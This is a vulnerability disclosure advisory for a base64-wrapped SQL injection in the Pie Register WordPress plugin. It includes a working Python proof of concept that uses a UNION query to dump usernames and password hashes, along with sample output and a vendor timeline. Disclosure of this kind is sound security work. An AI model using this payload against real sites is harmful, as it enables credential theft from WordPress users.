Pie Register 2.0.14-2.0.15, SQL Injection

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise). The input to the ‘invitaion_code’ parameter are decoded as Base64, and then inserted into the query without using SQL statement preparation, and as a result it is possible to UNION on your own query, as displayed in the PoC below.

Homepage

https://wordpress.org/plugins/pie-register/

CVSS Score

5

CSSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Uninstall the plugin – or patch manually

Proof of Concept

The below PoC will output a list of Usernames and Hashed Passwords from the current database.

import requests,base64,re

url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
        "show_dash_widget":1,
        "invitaion_code":query_encoded
}
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)

Output

~$ python g0blin-00040.py
test,$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0

Timeline

  • 2015-03-16:  Discovered
  • 2015-03-16: Vendor notified
  • 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
  • 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
  • 2015-04-13: Update requested from Vendor
  • 2015-04-20: Update requested from Vendor
  • 2015-04-20: Vendor states new version
  • 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
  • 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
  • 2015-05-04: Advisory released: